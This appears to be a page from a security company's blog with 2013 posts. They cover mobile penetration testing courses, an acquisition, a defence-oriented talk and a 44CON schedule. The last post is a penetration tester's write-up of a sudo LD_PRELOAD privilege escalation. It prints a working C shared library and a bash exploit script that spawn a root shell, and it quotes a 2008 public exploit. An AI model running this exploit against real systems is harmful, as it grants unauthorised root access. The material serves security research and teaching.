Grey bar Blue bar
Share this:

Fri, 22 Nov 2013

Hacking by Numbers - The mobile edition

West Coast in the house, well actually more like an African visiting Seattle for Blackhat's West Coast Trainings.


We've had a great year delivering the latest course in our amazing Hacking by Numbers training series: Mobile. What's cool about this course, is like the others, we teach a hacking methodology rather than punting a tool or a magic, do it all solutions.


Mobile was created to match the continuous growth in mobile phone usage, with a specific focus on showing you how you would go about testing the mobile platforms and installed applications, to ensure they have been developed in a secure manner. HBN Mobile provides a complete and practical window into the methods used when attacking mobile platforms and presents you with a methodology that can be applied across platforms. This course is structured to cater to penetration testers who are new to the mobile area and who need to understand how to analyze and audit applications on various mobile platforms using a variety of tools.


Some of the material covered in the course includes:


  • Android, iOS, RIM and Windows 8 Platform security

  • Communication protocols

  • Programming languages for mobile development

  • Building your own mobile penetration testing lab

  • Mobile application analysis

  • Static Analysis

  • Authentication and authorization

  • Data validation

  • Session management

  • Transport layer security and information disclosure


The methodology presented is structured to allow testing to be performed on different mobile platforms and is demonstrated using both the Android and iOS platforms. Like all the HBN courses, the mobile edition focuses heavily on demonstration and hands-on practicals.



Blackhat Las Vegas 2013 saw the introduction HBN Mobile with two training sessions being presented. The course was well attended and consisted of students with varying degrees of mobile experience, however, the vast majority were new to Mobile application security and HBN Mobile provided the ideal launch pad for them. The great thing about the HBN series is that it accommodates people from all technical and security backgrounds. This held true with the Mobile edition, where we had reverse engineers, penetration testers, development managers, aerospace engineers and developers just to name a few. The feedback from the course was extremely positive and has been fed back into the course and used to improve it even further. Then we had the chance to give it to students over at 44Con in London and this again gave us a chance to take your feedback and make the course even better.


What's slightly different about this course is that you get to find flaws in common mobile applications available both in the Google Play and Apple App store. In addition, we have devices for you to use, so not everything is done in an emulator. As a result, students on the last course found common security vulnerabilities in numerous well known and popular applications.


On the 11th December in Seattle, I'll be delivering Hacking by Numbers: Mobile edition at Blackhat and I cannot wait to get on that plane. If you want to learn more about how to tear apart mobile apps, this is definitely for you. The regular price goes up on the 5th of December, so take advantage of this now and book your place.



Look forward to seeing you there.

Fri, 1 Nov 2013

A new owner for a new chapter

We're pleased to announce our acquisition today by SecureData Europe.


SecureData (www.secdata.com) is a complete independent security services provider based in the UK and was also previously part of the SecureData Holdings group before being acquired by management in November 2012. The strategic acquisition complements SecureData's vision for enabling an end-to-end, proactive approach to security for global customers by assessing risk, detecting threats in real-time, protecting valuable assets and responding to security issues when they occur.


This deal signals the culmination of a long period of negotiation between SecureData Holdings, SecureData Europe and SensePost management and represents a cordial and amicable arrangement that is considered to be to the benefit of all three businesses. As the management of SensePost we are fully committed to this change, which we believe is in the best interests of SensePost, our staff and our customers. We believe this move will herald for us a new era of growth and development that will see us better equipped and prepared to meet the requirements of the market and fulfil our mission of providing insight, information and systems that enable our customers to make informed decisions about information security.


We look forward to a to an exciting period of innovation, growth and development that we believe this transaction will ultimately enable!

Fri, 6 Sep 2013

Offence oriented defence

We recently gave a talk at the ITWeb Security Summit entitled "Offense Oriented Defence". The talk was targeted at defenders and auditors, rather then hackers (the con is oriented that way), although it's odd that I feel the need to apologise for that ;)


The talks primary point, was that by understanding how attackers attack, more innovative defences can be imagined. The corollary was that common defences, in the form of "best practise" introduce commonality that is more easily exploited, or at least degrade over time as attackers adapt. Finally, many of these "security basics" are honestly hard, and we can't place the reliance on them we'd hoped. But our approach doesn't seem to want to acknowledge the problem, and much like an AA meeting, it's time we recognise the problem.


If you had to look at the average security strategy or budget items, you often end up with a list containing a couple of these:


  • Compliance/GRC - building policies, auditing against them, responding to audits

  • Risk Management - enumerating and ranking all the info sec risks, prioritising them, and justifying spend to mitigate

  • Best Practises - strengthening passwords, pushing patches, configuration management, etc.

  • Technology - cue buzzwords - UTM, WAF, DLP, DAM, SIEM, IPS, AV

  • Staff - everyone needed to get the above stuff done: compliance specialists, risk specialist, security managers, device ops managers


But, the truth is many of these items don't actually block attacks, or the few that do, don't really counter the common bypassed used to side-step them. For example:


  • It's really hard to link risk-based priorities to meaningful technical priorities.

  • Compliance drives a "teach the test" approach with little incentive to create contradictory measurements.

  • Then how can we have a bunch of things called "best practise" when we can't honestly say we know how to defend. Even then, some BPs are practically impossible to achieve in anything but a point in time. And the main point of this talk; common practises have common bypasses.


The current place we seem to be in is akin to having everyone build a wall. Attackers get to evaluate the wall, figure out how to get over it, and add to their capability (i.e. get a longer rope). But once they have a longer rope, they can use it over and over again, and against more than one wall. So attackers, who are quite good at sharing, get to keep building their tool chain, while all defenders can do it to keep building a higher wall, and maintaining the increasingly untenable structure. By understanding how attackers attack, we can break out of this and try more innovative approaches.


The talk is illustrated with four broad examples: Passwords, Patches, Anti-Virus and DMZs. For each, the belief around specific configurations is discussed, and how those don't stand up to how attackers actually attack. For example, the way AV's believed to work doesn't seem to correspond with how easy they are to bypass, or the common configuration of standard password controls such as lockout, don't seem to take into account horizontal brute-force attacks.


The point I want to make here is somewhat subtle; if you walk away thinking I've described new attacks, then you've missed it, if you think I'm recommending "the basics" then you've missed it. Truthfully, maybe it's just that I didn't make it very well ... decide for yourself, here are the slides:

Thu, 5 Sep 2013

44CON 2013

In one week, it's 44CON time again! One of our favourite UK hacker cons. In keeping with our desire to make more hackers, we're giving several sets of training courses as well as a talk this year.


Training: Hacking by Numbers - Mobile Edition


If you're in a rush, you can book here.


We launched it at Blackhat USA, and nobody threw anything rotting, in-fact some said it went pretty well; our latest addition to the Hacking by Numbers training.


We created the course to share our experience testing mobile applications and platforms, and well, because lots of people asked us to. The course shows you how to test mobile platforms and installed applications for vulnerabilities. HBN Mobile provides a pretty complete and practical overview into the methods used when attacking mobile platforms and presents you with a methodology that can be applied across platforms (although we focus on iOS and Android). This course is mostly for existing penetration testers who are new to the mobile area looking to learn how to understand, analyse and audit applications on various mobile platforms.


For more information about the course, and to book a place, head over here.


Workshop: Malware Reverse Engineering


If we were marketing to hipsters, we'd use words like “bespoke” and “handcrafted” to describe this workshop. While it's not made out of yams, it was put together especially for 44con.


Inaki and Siavosh's workshop will cut through the black-magic often associated with reverse engineering and malware. Advanced attacks usually have some form of malware involved, and learning to pull these apart to understand the kill chain is an increasingly vital skill.


Using real malware used in attacks against large corporates, students will look at both behavioural analysis and code analysis, to determine what the malware does.


If you're keen to attend, speak to the 44con crew at the front desk on arrival.


Talk: 'Honey, I'm Home' - Hacking Zwave Home Automation Systems


Behrang and Sahand will be presenting the results of their research into smart homes on day two at 09:30am.


“Smart homes” employing a variety of home automation systems are becoming increasingly common. Heating, ventilation, security and entertainment systems are centrally controlled with a mixture of wired and wireless networking. In 2011 the UK market for home automation products was estimated at GBP 65 million, an increase of 12% on the previous year, with the US market exceeding $3 billion. Zigbee and Z-Wave wireless protocols underpin most home automation systems. Z-Wave is growing in popularity as it does not conflict with existing 2.4GHz WiFi and Bluetooth systems.


Their talk describes the Z-Wave protocol and a number of weaknesses, including how to build a low-cost attack kit to perform packet capture and injection, along with potential attacks on the AES crypto implementation. Bottom line: they can walk up to a house, disable security sensors, then open the front door. LIKE A BOSS

Wed, 28 Aug 2013

Something about sudo, Kingcope and re-inventing the wheel

Willems and I are currently on an internal assessment and have popped a couple hundred (thousand?) RHEL machines, which was trivial since they are all imaged. Anyhoo - long story short, we have a user which is allowed to make use of sudo for a few commands, such as reboot and service. I immediately thought it would be nice to turn this into a local root somehow. Service seemed promising and I had a looksy how it works. Whilst it does do sanitation of the library path it does not remove LD_PRELOAD. So if we could sneak LD_PRELOAD past sudo then all should be good ?


For lack of deeper understanding I googled around the issue and came across http://www.catonmat.net/blog/simple-ld-preload-tutorial which is a vanilla LD_PRELOAD example overiding glib's fopen() call. That sort of suited me well since I reckoned starting services will prolly read config files.


So after a little fiddling I came up with the following creature:



/* gcc -Wall -fPIC -shared -o myfopen.so myfopen.c */
/* http://www.catonmat.net/blog/simple-ld-preload-tutorial/ */


#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>


FILE *fopen(const char *path, const char *mode) {
printf("MAKE ME A SANDWICH\n");
if (access("/tmp/sandwich", F_OK) != -1)
{
unlink("/tmp/sandwich");
system("/bin/bash");
}
else
{
//printf("fake fopen: not active \n");
}
return NULL;
}

which could be invoked via



#!/bin/bash
touch /tmp/sandwich
sudo LD_PRELOAD=/home/george/Desktop/playground/ld_preload/myfopen.so /etc/init.d/ssh restart

Best thing was it sort of worked! Ugly but functioning...
While trying to work out the finer details, however, I came across a sploit Kingcope had written in 2008, which exploited exactly this issue! Apparently older sudos did not "Defaults env_reset" or "Defaults setenv" which makes the LD_PRELOAD possible. (This still applies to [mis]configurations which preserve the environment)
As always with Kingcope sploits it is very elegant and definitely worth a look.


On a side note: the header of his sploit says:



# http://www.exploit-db.com/exploits/7129/
#
#* Sudo <= 1.6.9p18 local r00t exploit
#* by Kingcope/2008/www.com-winner.com
#
# Most lame exploit EVER!
#
# Needs a special configuration in the sudoers file:
# --->>>>> "Defaults setenv" so environ vars are preserved :) <<<<<---
#
# May also need the current users password to be typed in
# So this exploit is UBERLAME!
# First Argument to this shell file: A program your current
# user is allowed to execute via sudo. sudo has to be in
# the path!!
# successfully tested on FreeBSD-7.0 and RedHat Linux
# I don't even know why I realease such stuffz
# I'M GONNA GRAB A COFFE NOW;HAVE PHUN !!!

so Kingcope considered the vuln UEBERLAME ... I don't know if I should be proud or sad for having found it five years later then....
Anyhoo, at this point I was already pretty invested in the thing and decided to see the re-invention of the wheel through. Kingcope's shared object was a lot slicker than mine, hooking into _init() rather than fopen() which makes it a lot more generic and elegant. He used unsetenv(LD_PRELOAD) to execute but once which is also a lot more elegant.


So I shamelessly stole from his sploit... I don't see the need for a suid shell stager and fancy execls when a simple system() does the job, but I am prolly missing several points =) So without further waffle here it is - its called sandwhich sploit as an homage to the classic XKCD sudo comic.




1 #!/bin/bash
2 #
3 # old/misconfigured sudo local root
4 #
5 # disclosed by Kingcope in 2008
6 # http://www.exploit-db.com/exploits/7129/
7 #
8 # "re-discovered" in 2013 by
9 # george@sensepost.com
10 #
11
12
13 echo
14 echo "[!] $0 - sudo un-sanitised environment sploit"
15 echo "[!] usage: $0 <program to run via sudo> "
16 echo
17
18
19 cat > /tmp/sandwich.c << _EOF
20 #include <stdio.h>
21 #include <stdlib.h>
22 #include <unistd.h>
23 #include <sys/types.h>
24
25 void _init()
26 {
27 if (!geteuid())
28 {
29 unsetenv("LD_PRELOAD");
30 setgid(0);
31 setuid(0);
32 unlink("/tmp/sandwich.so");
33 unlink("/tmp/sandwich.c");
34 system("/bin/bash");
35 }
36 }
37
38 _EOF
39
40
41 gcc -fPIC -shared -o /tmp/sandwich.so /tmp/sandwich.c -nostartfiles
42 sudo LD_PRELOAD=/tmp/sandwich.so $1
43